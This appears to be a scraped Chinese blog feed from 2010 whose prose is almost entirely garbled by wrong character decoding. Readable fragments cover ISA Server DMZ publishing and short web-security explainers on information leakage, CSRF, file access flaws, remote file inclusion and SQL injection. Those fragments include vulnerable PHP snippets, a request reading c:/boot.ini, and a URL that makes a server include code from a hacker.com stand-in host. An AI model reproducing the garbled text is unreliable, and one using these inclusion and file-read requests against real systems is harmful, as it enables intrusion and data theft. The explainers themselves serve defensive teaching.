 鍦ㄩ獙璇佷簡DMZ鍖哄煙鍜孖nternet鐨勭綉緇滃眰榪為氭у悗錛屾垜浠绔嬪埢鍒囧叆姝i錛氬疄鐜板DMZ鍖哄煙鐨勫簲鐢ㄣ傛垜浠殑鐩殑鏄浣垮緱DMZ鍖哄煙鐨勫悇縐嶆湇鍔¤兘澶熻Internet涓婄殑鐢ㄦ埛璁塊棶銆備綘鍙互灝哤eb鏈嶅姟銆丗TP鏈嶅姟銆侀偖浠舵湇鍔$瓑絳夐儴緗插湪DMZ鍖哄煙錛屼粠鑰屾彁渚汭nternet鐢ㄦ埛鐨勮闂傜瑪鑰呬婦3涓吀鍨嬬殑渚嬪瓙鏉ヨ鏄嶪SA濡備綍鍙戝竷DMZ鍖哄煙鐨勬湇鍔″櫒銆?/p>

鍙戝竷DMZ鍖哄煙鐨刉eb鏈嶅姟
     1. 棣栧厛錛岃緗ソDMZ鍖哄煙鐨刉eb 鏈嶅姟鍣紝榛樿鎯呭喌涓嬪畠搴旇鍦?0绔彛鐩戝惉Web璇鋒眰,濡傚浘10銆傝緗畬鎴愬悗錛岃鍒╃敤netstat 宸ュ叿鏌ョ湅Web鏈嶅姟鍣ㄦ槸鍚﹀湪0.0.0.0涓婄洃鍚?0绔彛錛堢瑪鑰呭亣璁句綘娌℃湁紱佺敤SocketPooling錛?br>   2. 鍦↖SA Server涓婂埄鐢↖P PACKET FILTER灝哤eb鏈嶅姟鍙戝竷銆傚叾瀹炶鍙戝竷鏈変簺榪囦簬鐗靛己錛孖SA瀹為檯涓婃槸涓涓叿鏈夎繃婊ゅ姛鑳界殑璺敱鍣紝鎵浠ユ垜浠彧鏄厑璁告潵鑷狪nternet鐢ㄦ埛鐨刉eb璇鋒眰鍙互榪涘叆鍒癉MZ涓婄殑Web鏈嶅姟鍣ㄣ傝緗殑鍐呭濡傚浘11錛嶅浘14鎵紺恒?br>   3. 鍦↖nternet涓婄殑璁$畻鏈洪獙璇佹槸鍚﹀彲浠ユ紜闂綅浜嶥MZ鍖哄煙鐨刉eb鏈嶅姟鍣ㄣ傚彲浠ョ湅鍒版垜浠彲浠ユ紜殑璁塊棶Web欏甸潰錛屾濡傚浘15鏄劇ず鐨勯偅鏍楓傚湪楠岃瘉涔嬪墠錛屼綘搴旇絳夊緟涓浼氬効浠ヤ嬌鍒氬垰寤虹珛鐨勫皝鍖呰繃婊ょ敓鏁堬紝鎴栬呴噸鏂板惎鍔‵irewall Service鏈嶅姟銆?br>
 瀹屾垚浜嗭紝涓婅竟鐨勮緗悗錛屼笉浠匢nternet涓婄殑鐢ㄦ埛鍙互璁塊棶榪欏彴Web鏈嶅姟鍣紝ISA Server榪炴帴鐨勫唴閮ㄧ綉緇滀腑鐨勭敤鎴蜂篃鍙互璁塊棶錛屽洜涓烘垜浠湪鍥?4涓殑Remote Computer涓夋嫨鐨勬槸All Remote Computers銆?br>
鍙戝竷DMZ鍖哄煙鐨凢TP鏈嶅姟

 鐢變簬FTP鏈変袱縐嶅伐浣滄ā寮忥紝PORT鍜孭ASV妯″紡錛屽叿浣撳尯鍒瑙佹湰鍒婃潅蹇?002騫寸涔濇湡銆婃祬鏋怓TP宸ヤ綔鍘熺悊銆嬨?/strong>

 鍙戝竷PORT妯″紡鐨凢TP鐨勬楠ゅ涓?br>  1錛岃緗ソDMZ鍖哄煙鐨凢TP鏈嶅姟鍣紝浣垮叾鍦?1绔彛涓婄洃鍚傚鍥?6銆傚綋鐒朵綘涔熷彲浠ヤ嬌鐢ㄥ叾浠栫鍙o紝鍙笉榪囪鍦ㄩ厤緗甀P PACKET FILTER鏃惰鍋氱浉搴旂殑璋冩暣銆?br>  2錛屼笉璁哄摢縐嶆ā寮忕殑FTP錛岄兘闇瑕佸厑璁歌繙绔敤鎴瘋繛鎺TP鏈嶅姟鍣?1绔彛鐨勮繘鍏ヨ姹傦紝鎵浠ラ渶瑕佷負姝ゅ緩绔嬩竴涓皝鍖呰繃婊わ紝鍏蜂綋璁劇疆濡傚浘17錛嶅浘20銆?br>  3錛屼負FTP鐨勬暟鎹氶亾鐨勫緩绔嬭緗竴涓皝鍖呰繃婊ゃ傜敱浜嶱ORT妯″紡鐨勬暟鎹氶亾鐨勫緩绔嬭姹傛槸鐢盕TP鏈嶅姟鍣ㄤ富鍔ㄥ彂璧風殑錛屾墍浠ュ皝鍖呰繃婊ょ殑direction 搴旇鏄疧utbound鑰屼笉鏄疘nbound銆傚叿浣撶殑璁劇疆濡傚浘21錛嶅浘22銆?/p>

 鍙戝竷PASV妯″紡鐨凢TP鐨勬楠ゅ涓?br>  1錛岃緗瓼TP鏈嶅姟鍣ㄥ湪21绔彛鐩戝惉錛屽涓婅竟鎵榪?br>  2錛岀敱浜嶱ASV妯″紡鐨勬墍鏈夎繛鎺ラ兘鏄湁FTP瀹㈡埛绔彂璧風殑錛屽茍涓斾嬌鐢ㄧ殑绔彛騫朵笉鏄浐瀹氱殑錛屽洜姝ゅ彧闇瑕佷竴涓?#8220;闈炲畨鍏?#8221;鐨勫皝鍖呰繃婊ゅ嵆鍙畬鎴怭ASV妯″紡鐨凢TP鏈嶅姟鍣ㄥ彂甯冦傚鍥?3錛嶅浘26銆?/p>

 瀹屾垚FTP鐨勫彂甯冨悗錛屾垜浠湪Internet涓婄殑FTP瀹㈡埛绔獙璇佹槸鍚﹀彲浠ユ紜殑浠ORT鍜孭ASV妯″紡榪炴帴鍒頒綅浜嶥MZ鐨凢TP鏈嶅姟鍣紝鍙互鐪嬪埌錛屽鍥?7鍜屽浘28錛岃繛鎺ユ垚鍔熴傚湪鍙戝竷PASV妯″紡鐨凢TP鏈嶅姟鍣ㄦ椂錛屾垜浠緗簡涓涓畨鍏ㄦц緝宸殑灝佸寘榪囨護錛屼絾鏄繖涔熸槸鍙戝竷浣嶄簬DMZ鍖哄煙鐨凱ASV妯″紡FTP鐨勬棤濂堜箣涓俱傚洜涓烘垜浠煡閬揊TP鐨勬暟鎹氶亾浣跨敤鐨勭鍙f槸鍔ㄦ佺殑錛岃屼笖鍔ㄦ佺殑鑼冨洿鎴戜滑涓嶆槗鎺у埗錛岀壒鍒槸浣跨敤寰蔣IIS涓彁渚涚殑FTP鏈嶅姟錛屾垜浠牴鏈棤娉曟帶鍒躲備笉榪囦綘鍙互閫夋嫨鍙︿竴嬈綟TP鏈嶅姟鍣ㄧ杞歡錛歋ervU銆傝繖涓湇鍔″櫒绔蔣浠跺彲浠ユ帶鍒禤ASV妯″紡寤虹珛鏁版嵁閫氶亾鏃朵嬌鐢ㄧ殑绔彛鑼冨洿錛岄氳繃璁劇疆榪欎釜绔彛鑼冨洿鎴戜滑鍙互鎺у埗鏈湴FTP鏁版嵁閫氶亾浣跨敤鐨勭鍙o紝浣嗘槸鐩稿簲鐨勶紝鍦↖P PACKET FILTER涓殑璁劇疆涔熶細楹葷儲璁稿錛屼綘瑕佷負榪欎釜绔彛鑼冨洿涓寘鍚殑鎵鏈夌鍙i兘璁劇疆涓涓繘鍏ョ殑灝佸寘榪囨護銆傚鏋滀綘瀵瑰畨鍏ㄦу緢閲嶈錛岃繖涓竴鍔蟲案閫鎬絾鏄粷瀵歸夯鐑︾殑宸ヤ綔榪樻槸鏈夊繀瑕佺殑銆傜瑪鑰呰涓猴紝灝咶TP鏈嶅姟鍣ㄩ儴緗插湪DMZ鍖哄煙涔熻騫朵笉鏄竴涓槑鏅轟箣涓撅紝闄ら潪浣犲彲浠ユ壙鍙楄繖鍙癋TP鏈嶅姟鍣ㄥ彲浠ュ彈鍒版敾鍑葷殑浜嬪疄錛屾垨鑰呬綘鏀懼純浣跨敤PASV妯″紡鐨凢TP銆傜劧鑰岋紝灝咶TP鏈嶅姟鍣ㄩ儴緗插湪鍐呴儴緗戠粶錛屽彲浠ュ湪淇濊瘉瀹夊叏鎬х殑鍓嶆彁涓嬶紙鐢氳嚦鏄姞寮哄畨鍏ㄦэ級鍑忚交璁稿宸ヤ綔錛屽洜涓哄姩鎬佺鍙g殑闂浣犱笉蹇呭姵紲烇紝FTP Application Filter鍜孧S Proxy Protocol鍙互寰堝ソ鐨勪負浣犺В鍐籌紝鏈夊叧鍦ㄥ唴閮ㄧ綉緇滈儴緗睩TP鏈嶅姟鍣ㄧ殑闂璇峰弬鑰冦婁嬌鐢↖SA Server鍙戝竷闈炴爣鍑嗙鍙g殑FTP鏈嶅姟鍣ㄣ嬩互鍙娿婄敤ISA Server 2000鍙戝竷鍐呴儴緗戠粶鐨処IS FTP 鏈嶅姟鍣ㄣ嬨?br>
 姝ゅ錛屽鏋滀綘鍐沖畾涓哄湪DMZ鍖哄煙閮ㄧ講鐨凢TP璁劇疆閭d釜“闈炲畨鍏?#8221;灝佸寘榪囨護錛岀瑪鑰呮湁蹇呰鍋氫竴浜涘畨鍏ㄨ鍛婏細浣犵殑榪欏彴FTP鏈嶅姟鍣ㄥ畬鍏ㄦ毚闇茬粰Internet涓婄殑鎵鏈夌敤鎴鳳紝浠諱綍Internet鐢ㄦ埛鍙互榪炴帴榪欏彴鏈嶅姟鍣ㄧ殑浠繪剰绔彛銆侷SA Server鍞竴鍙互鍋氱殑鏄埄鐢↖P PACKET FILTER涓殑鍏ㄥ眬閰嶇疆錛圛nstruction Detection 錛変負榪欏彴FTP鏈嶅姟鍣ㄥ仛涓浜涗繚鎶ゃ傚湪榪欑鎯呭喌涓嬶紝浣犲彲浠ュ湪FTP鏈嶅姟鍣ㄤ笂錛屽畨瑁呬竴嬈懼崟鏈虹増鐨勯槻鐏杞歡鏉ュ姞寮哄榪欏彴鏈嶅姟鍣ㄧ殑淇濇姢錛岃繖縐嶄繚鎶ゆ槸紜疄鏈夋晥鐨勶紝浣嗘槸鐩稿簲鐨勪篃浼氬鍔犳垚鏈傜瑪鑰呮帹鑽愪互涓嬪嚑嬈懼崟鏈虹増闃茬伀澧欒蔣浠訛細Norton Internet Security銆丅lackICE銆乑oneAlarm銆佸ぉ緗戦槻鐏銆?

 涓嬭竟錛岀瑪鑰呬粙緇嶄竴涓緢鏈夋剰鎬濈殑鍙戝竷DMZ鍖哄煙鐨凪ail Relay Server鐨勬渚嬨傚湪寰堝浼佷笟涓紝閭歡鏈嶅姟鏄潪甯擱噸瑕佺殑錛屾墍浠ヨ鏈変竴縐嶅彲琛岀殑鎺柦鏈夋晥鐨勪繚鎶や紒涓氬唴閮ㄧ殑閭歡鏈嶅姟鍣ㄤ笉琚敾鍑匯傚鏋滆繖涓偖浠舵湇鍔″櫒蹇呴』琚極娓哥殑鐢ㄦ埛浣跨敤錛岄偅涔堣繖鍙伴偖浠舵湇鍔″櫒灝卞繀欏誨彲浠ラ氳繃Internet琚闂紝榪欐牱灝遍潰涓翠袱縐嶉夋嫨錛屼竴鏄妸閭歡鏈嶅姟鍣ㄩ儴緗插湪鍐呴儴緗戠粶錛岀劧鍚庨氳繃ISA鍙戝竷鍑哄幓錛涘彟涓縐嶆槸鎶婇偖浠舵湇鍔″櫒閮ㄧ講鍦―MZ鍖哄煙鍒╃敤IP PACKET FILTER鍙戝竷銆傛垜浠彲浠ョ患鍚堜竴涓嬩互涓婁袱縐嶆柟妗堢殑瀹夊叏鍜屾ц兘鐨勫鉤琛$偣錛屾妸閭歡鏈嶅姟鍣ㄩ儴緗插湪鍐呴儴緗戠粶錛屽湪DMZ鍖哄煙閮ㄧ講涓鍙伴偖浠惰漿鍙戞湇鍔″櫒錛岄氳繃ISA鍙彂甯冧綅浜嶥MZ鍖哄煙鐨勯偖浠惰漿鍙戞湇鍔″櫒錛岃繖鏍蜂笉浠呭彲浠ユ湁鏁堢殑淇濇姢閭歡緋葷粺鐨勭湡瀹炲涓諱笉琚敾鍑伙紝鍥犱負浣犲彂甯冪殑鍙槸涓涓偖浠惰漿鍙戞湇鍔″櫒錛屽悓鏃朵篃鑳藉鍒╃敤閭歡杞彂鏈嶅姟鍣ㄥ拰ISA鐨凷MTP Filter瀹炴柦鍒嗙駭鐨勯偖浠惰繃婊ゃ?/p>

 瀹屾垚榪欎釜鍙戝竷宸ヤ綔鎴戜滑闇瑕佸仛浠ヤ笅鍑犱歡浜嬫儏
 - 鍦ㄤ紒涓氬唴閮ㄩ儴緗睧xchange Server 2000錛堟湰鏂囦笉璁ㄨ錛?br> - 鍦―MZ鍖哄煙閮ㄧ講閭歡杞彂鏈嶅姟鍣?br> - 鍙戝竷鍐呴儴緗戠粶鐨勯偖浠舵湇鍔″櫒緇橠MZ鍖哄煙鐨勯偖浠惰漿鍙戞湇鍔″櫒
 - 鍒╃敤IP PACKET Filter鍙戝竷閭歡杞彂鏈嶅姟鍣?/p>

 

 



灝忛粯 2010-04-27 09:23 鍙戣〃璇勮
]]>
銆愯漿銆慦EB瀹夊叏緋誨垪涔嬪叚錛氫俊鎭硠闇插拰涓嶆紜殑閿欒澶勭悊http://m.shnenglu.com/momoxiao/archive/2010/04/14/112558.html灝忛粯灝忛粯Wed, 14 Apr 2010 07:04:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112558.htmlhttp://m.shnenglu.com/momoxiao/comments/112558.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112558.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/112558.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/112558.html    * 姝ゆ紡媧炲埄鐢ㄧ殑閲嶇偣鍦ㄤ簬搴旂敤紼嬪簭鏈兘姝g‘澶勭悊鑷韓鍙戠敓鐨勯敊璇?
    * 姝ゆ紡媧炵殑鎶鏈噸鐐瑰湪浜庢煇浜涘簲鐢ㄧ▼搴忓嚭閿欐椂錛屼細鎶婇敊璇俊鎭弽棣堝埌鐢ㄦ埛绔紝榪欎簺閿欒淇℃伅閫氬父鍙敤浜庤皟璇曠殑鐩殑
    * 姝ゆ紡媧炵殑鏂規硶閲嶇偣鍦ㄤ簬浠庨敊璇弽棣堜俊鎭腑鑾峰彇鏈夌敤鐨勪俊鎭紝浠庤屽姞浠ュ埄鐢紝紿佺牬緗戠珯瀹夊叏


        褰揥eb搴旂敤紼嬪簭鍙戠敓閿欒鏃訛紝濡傛灉澶勭悊涓嶅緱褰擄紝鍙兘浼氭妸鐩稿叧鐨勯敊璇俊鎭弽棣堣嚦瀹㈡埛嫻忚鍣ㄣ?br>
        榪欑鎯呭喌鏇村瑙佷簬PHP+MySQL鐨刉eb搴旂敤錛屼竴浜涚▼搴忎漢鍛樻病鏈夋紜殑鍋氬紓甯稿鐞嗭紝褰撳彂鐢熼敊璇噷錛岀郴緇熷悜嫻忚鍣ㄧ榪斿洖浜嗘湰鏉ユ槸鐢ㄤ簬璋冭瘯鐩殑鐨勭浉鍏充俊鎭傝繖浜涗俊鎭線寰鍙兘鍚湁閲嶈鐨勫畨鍏ㄤ俊鎭?br>
        渚嬪錛氭煇涓綉绔欑殑MySQL鍋滄浜嗚繍琛岋紝鑰岃繖鏃剁敤鎴瘋闂緗戠珯鏃訛紝鍙戠幇緗戦〉鎻愮ず濡備笅淇℃伅錛?br>                MySQL Error:Lost connection to MySQL server during query
        浠庤繖涓洖棣堟潵鐪嬶紝鐢ㄦ埛璇鋒眰鐨勯〉鎵浣跨敤鐨勬暟鎹簱鏄疢ySQL ! 榪欐棤鐤戞毚闇叉槸瀹夊叏浜哄憳鎵涓嶅笇鏈涚湅鍒扮殑銆?br>
        楂樻槑鐨勫叆渚佃咃紝浼氬敖鍙兘鐨勪嬌鍏跺湪欏甸潰嫻忚鎴栨彁浜ゆ椂錛屼嬌鐢ㄤ笉姝e綋鐨勬暟鎹垨鏂規硶錛屼互姝ゆ湡鏈涢〉闈駭鐢熼敊璇洖棣堬紝浠庤屽埄鐢ㄨ繖浜涗俊鎭畬鎴愬叆渚點?br>
        浠庢湇鍔″櫒瑙掑害錛屽叧闂皟璇曚俊鎭洖棣堝姛鑳斤紝騫朵笖鍠勭敤寮傚父澶勭悊鍔熻兘錛屽彲浠ュ敖鍙兘閬垮厤姝ょ被瀹夊叏婕忔礊銆?/font>

灝忛粯 2010-04-14 15:04 鍙戣〃璇勮
]]>
銆愯漿銆慦EB瀹夊叏緋誨垪涔嬩簲錛氳法绔欒姹備吉閫?/title><link>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112556.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Wed, 14 Apr 2010 06:40:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112556.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/112556.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112556.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/112556.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/112556.html</trackback:ping><description><![CDATA[<font size=2><strong>    * 璺ㄧ珯璇鋒眰浼犳紡媧炲埄鐢ㄧ殑閲嶇偣鏀誨嚮鑰呬簡瑙e彈瀹寵呮墍鍦ㄧ殑绔欑偣<br>    * 璺ㄧ珯璇鋒眰浼犳紡媧炵殑鎶鏈噸鐐瑰湪浜庢敾鍑昏呴渶瑕佺簿蹇冩瀯閫犲彲浠ュ畬鎴愮洰鏍囪鐐規暟鎹慨鏀圭殑URL<br>    * 璺ㄧ珯璇鋒眰浼犳紡媧炵殑鏂規硶閲嶇偣鍦ㄤ簬鏀誨嚮鑰呯殑鐩爣绔欑偣鍏鋒湁鎸佷箙鍖栨巿鏉僣ookie鎴栬呭彈瀹寵呭叿鏈夊綋鍓嶄細璇漜ookie錛屽茍涓旂洰鏍囩珯鐐規病鏈夊鐢ㄦ埛鍦ㄧ綉绔欒涓虹殑絎簩鎺堟潈<br><br><br></strong>        鎴戜滑鍋囧畾涓変釜瑙掕壊錛氭敾鍑昏呫佺敤鎴楓佺綉涓婇摱琛屻佷竴涓鍧涖?br><br>        鏀誨嚮鐨勬祦紼嬩富瑕佸垎浠ヤ笅鍑犱釜姝ラ錛?br><br>        1銆佺敤鎴瘋繛鍏ョ綉涓婇摱琛屾搷浣滐紝璇ョ綉涓婇摱琛屼嬌鐢ㄦ寔涔呭寲鎺堟潈cookie錛屽彧瑕佺敤鎴蜂笉娓呴櫎cookies錛屼換浣曟椂鍊欒繛鍏ョ綉涓婇摱琛屾椂錛岃閾惰緗戠珯閮借涓鴻鐢ㄦ埛鏄湁鏁堢殑錛?br><br>        2銆佹敾鍑昏呭湪璁哄潧涓婂彂琛ㄥ浘鐗囷紝鍐呭祵鏈塆ET鎴朠OST鏂規硶鐨刄RL騫舵寚鍚戣緗戜笂閾惰錛屽鏋滆URL鐢變竴涓摱琛岀殑鍚堟硶鐢ㄦ埛鍙戝嚭錛屽垯璇RL浼氫嬌鐢ㄦ埛甯愭埛琚慨鏀癸紱<br><br>        3銆佺敤鎴鋒祻瑙堟璁哄潧騫剁偣鍑昏鍥劇墖錛屾敾鍑昏呴璁劇殑URL琚敱鐢ㄦ埛鍙戝線閾惰绔欑偣錛屽洜璇ョ敤鎴鋒湭娓呴櫎cookie錛岃璇鋒眰鏈夋晥錛岀敤鎴峰笎鎴峰湪鐢ㄦ埛騫朵笉鐭ユ儏鐨勫墠鎻愪笅琚垚鍔熶慨鏀廣?br><br>鎴戜滑娉ㄦ剰鍒幫紝榪欎釜榪囩▼寰堣薄璺ㄧ珯鑴氭湰鏀誨嚮錛屼絾瀹為檯涓婏紝鏄畬鍏ㄤ笉鍚岀殑銆傝法绔欒剼鏈敾鍑婚渶瑕佸湪瀹㈡埛绔啓鍏ユ伓鎰忎唬鐮侊紝浠ユ悳闆哻ookie絳変俊鎭紝鑰岃法绔欒姹備吉閫犲垯鏍規湰涓嶉渶瑕佸悜鐢ㄦ埛绔啓鍏ヤ換浣曚笢瑗匡紝鐩存帴鍒╃敤閾惰鎺堟潈鐨勬寔涔呰璇佸拰鐢ㄦ埛鏈竻鐞嗙殑cookie銆?br><br>        榪欓噷鐨勯棶棰樺湪浜庯紝璁哄潧鐢ㄦ埛涓嶈兘涓婁紶js鑴氭湰錛屼簬鏄洿鎺ュ埄鐢║RL鏉ヨ楠楃敤鎴鳳紝浠ヨ嚧浜庡畬鎴愭暟鎹搷浣溿?br><br>        鐢辨鍙錛岃鏀誨嚮鐨勯噸鐐瑰湪浜庤鐭ラ亾鐩爣绔欑偣鍜岀洰鏍囩敤鎴鳳紝騫朵笖璇ュ彈瀹崇珯鐐規病鏈変嬌鐢ㄦ洿澶氱殑鎺堟潈璁よ瘉銆?br><br>        瀵逛簬web绔欑偣錛屽皢鎸佷箙鍖栫殑鎺堟潈鏂規硶錛堜緥濡俢ookie鎴栬匟TTP鎺堟潈錛夊垏鎹負鐬椂鐨勬巿鏉冩柟娉曪紙鍦ㄦ瘡涓猣orm涓彁渚涢殣钘廸ield錛夛紝榪欏皢甯姪緗戠珯闃叉榪欎簺鏀誨嚮銆備竴縐嶇被浼肩殑鏂瑰紡鏄湪form涓寘鍚瀵嗕俊鎭佺敤鎴鋒寚瀹氱殑浠e彿浣滀負cookie涔嬪鐨勯獙璇併?br><br>        鍙︿竴涓彲閫夌殑鏂規硶鏄?#8220;鍙屾彁浜?#8221;cookie銆傛鏂規硶鍙伐浣滀簬Ajax璇鋒眰錛屼絾瀹冭兘澶熶綔涓烘棤闇鏀瑰彉澶ч噺form鐨勫叏灞淇鏂規硶銆傚鏋滄煇涓巿鏉冪殑 cookie鍦╢orm post涔嬪墠姝hjava script浠g爜璇誨彇錛岄偅涔堥檺鍒惰法鍩熻鍒欏皢琚簲鐢ㄣ傚鏋滄湇鍔″櫒闇瑕佸湪Post璇鋒眰浣撴垨鑰匲RL涓寘鍚巿鏉僣ookie鐨勮姹傦紝閭d箞榪欎釜璇鋒眰蹇呴』鏉ヨ嚜浜庡彈淇′換鐨勫煙錛屽洜涓哄叾瀹冨煙鏄笉鑳戒粠淇′換鍩熻鍙朿ookie鐨勩?/font> <img src ="http://m.shnenglu.com/momoxiao/aggbug/112556.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2010-04-14 14:40 <a href="http://m.shnenglu.com/momoxiao/archive/2010/04/14/112556.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>銆愯漿銆慦EB瀹夊叏緋誨垪涔嬪洓錛氫笉瀹夊叏鐨勭洿鎺ュ璞″紩鐢ㄦ紡媧?/title><link>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112555.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Wed, 14 Apr 2010 06:30:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112555.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/112555.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112555.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/112555.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/112555.html</trackback:ping><description><![CDATA[<p><font size=2><strong>    * 涓嶅畨鍏ㄧ殑鐩存帴瀵硅薄寮曠敤婕忔礊鍒╃敤鐨勯噸鐐規槸web寮鍙戜腑錛屽簲鐢ㄤ唬鐮佽闂枃浠舵椂娌″彈鍒版潈闄愭帶鍒?br>    * 涓嶅畨鍏ㄧ殑鐩存帴瀵硅薄寮曠敤婕忔礊鐨勬妧鏈噸鐐瑰湪浜庡埄鐢ㄦ湁婕忔礊鐨剋eb紼嬪簭璇誨彇鏂囦歡緋葷粺璧勬枡<br>    * 涓嶅畨鍏ㄧ殑鐩存帴瀵硅薄寮曠敤婕忔礊鐨勬柟娉曢噸鐐瑰湪浜庢湭鎺у埗搴旂敤紼嬪簭鐨勮闂潈闄?br><br>   鏈枃涓昏浠嬬粛涓嶅畨鍏ㄧ殑鐩存帴瀵硅薄寮曠敤婕忔礊鐨勮繃紼嬭屼笉鏄妧鏈粏鑺傘?浠HP涓轟緥錛岀湅浠ヤ笅榪欎釜鍦烘櫙錛?br><br></strong>$filea=$_GET['filename'];<br>echo “<a href=".$filea."> 涓嬭澆姝ら摼鎺?</a>";<br><br>濡傛灉鎭舵剰鐢ㄦ埛瀵逛箣鍔犱互鍒╃敤錛屽氨鍙兘鍙互浣跨敤濡備笅鏂瑰紡涓嬭澆鐢ㄦ埛涓繪満涓婂叾浠栫殑鏂囦歡<br>http://www.demo.com/downlist.php?filename=c:/boot.ini<br><br>瑙e喅姝ら棶棰樼殑鏂規硶鏄繀欏繪帶鍒秝eb搴旂敤紼嬪簭瀵規枃浠剁殑璁塊棶銆?/font></p> <img src ="http://m.shnenglu.com/momoxiao/aggbug/112555.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2010-04-14 14:30 <a href="http://m.shnenglu.com/momoxiao/archive/2010/04/14/112555.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>銆愯漿銆慦EB瀹夊叏緋誨垪涔嬩笁錛氭墽琛屾伓鎰忚剼鏈?/title><link>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112554.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Wed, 14 Apr 2010 06:24:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112554.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/112554.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2010/04/14/112554.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/112554.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/112554.html</trackback:ping><description><![CDATA[<div class="hvzpftn" id=read_tpc class=f14><font size=2><strong>    * 鎭舵剰浠g爜鎵ц鏀誨嚮鍒╃敤鐨勯噸鐐規槸web寮鍙戜腑寮曠敤鍙橀噺鍋氫負紼嬪簭鎵ц鐨勪竴閮ㄥ垎浠g爜<br>    * 鎭舵剰浠g爜鎵ц鏀誨嚮鐨勬妧鏈噸鐐瑰湪浜庤鏈嶅姟鍣ㄦ墽琛屼簡鎭舵剰浠g爜,浠庤屽畬鎴愬叆渚墊垨鏁版嵁鐩楀彇絳夎涓?br>    * 鎭舵剰浠g爜鎵ц鏀誨嚮鐨勬柟娉曢噸鐐瑰湪浜嶹eb寮鍙戜腑,瀵瑰彉閲忕殑寮曠敤鐨勫嚑涓叧閿儴浣嶆病鏈夌粏鍖栧鐞?/strong><br><br>   鏈枃涓昏浠嬬粛鎭舵剰浠g爜鎵ц鏀誨嚮鐨勮繃紼嬭屼笉鏄妧鏈粏鑺傘?br>鍏堢湅涓孌祊hp浠g爜鐨勪緥瀛愶細<br><br>$report = $_POST['file']; //瀹氫箟report鍙橀噺鏌愪釜琛ㄥ崟鍙橀噺<br>include $report;          //鍦ㄤ唬鐮佷腑鍖呭惈姝ゅ彉閲?br><br>濡傛灉鏀誨嚮鑰呭閥濡欑殑鍒╃敤榪欎釜婕忔礊錛屽氨鍙互浠よ鏀誨嚮鏈嶅姟鍣ㄦ墽琛岃嚜宸辯殑鎭舵剰紼嬪簭錛岀被浼肩殑璇硶錛?br>http://www.tester.com/index.php?file=http://www.hacker.com/attack.php<br><br>榪欐椂錛岀▼搴忓氨浼氳鍙栨伓鎰忕殑attack.php騫跺紩鍏ュ埌index.php涓仛涓烘墽琛岀殑涓涓儴鍒嗭紒<br><br>姝ょ被鏀誨嚮瀵逛簬鑴氭湰綾葷綉欏典唬鐮佹渶鏈夋晥銆?br><br>鍦ㄧ紪鍐欎唬鐮佹椂錛屽挨鍏舵槸鍒╃敤浠ヤ笅鐨勫嚱鏁板紩鐢ㄤ唬鐮佺墖孌墊椂錛?br>PHP錛歩nclude(), include_once(), require(), require_once(), fopen(), readfile(), ...<br>JSP/Servlet錛歫ava.io.File(), java.io.FileReader(), ...<br>ASP錛歩nclude file, include virtual, ...<br>搴旇瀵規墍寮曠敤鐨勫唴瀹瑰仛瀹夊叏鐨勮繃婊わ紒 </font></div> <img src ="http://m.shnenglu.com/momoxiao/aggbug/112554.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2010-04-14 14:24 <a href="http://m.shnenglu.com/momoxiao/archive/2010/04/14/112554.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>銆愯漿銆慦EB瀹夊叏緋誨垪涔嬩簩錛歋QL娉ㄥ叆婕忔礊http://m.shnenglu.com/momoxiao/archive/2010/04/14/112553.html灝忛粯灝忛粯Wed, 14 Apr 2010 06:18:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112553.htmlhttp://m.shnenglu.com/momoxiao/comments/112553.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/04/14/112553.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/112553.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/112553.html   * 娉ㄥ叆婕忔礊鏀誨嚮鍒╃敤鐨勯噸鐐規槸鍏鋒湁浜や簰鍔熻兘鐨勪嬌鐢ㄦ暟鎹簱鐨勫姩鎬佺珯鐐?br>    * 娉ㄥ叆婕忔礊鏀誨嚮鐨勬妧鏈噸鐐規槸鍦ㄦ湇鍔″櫒绔墽琛屾敾鍑昏呯殑SQL璇彞
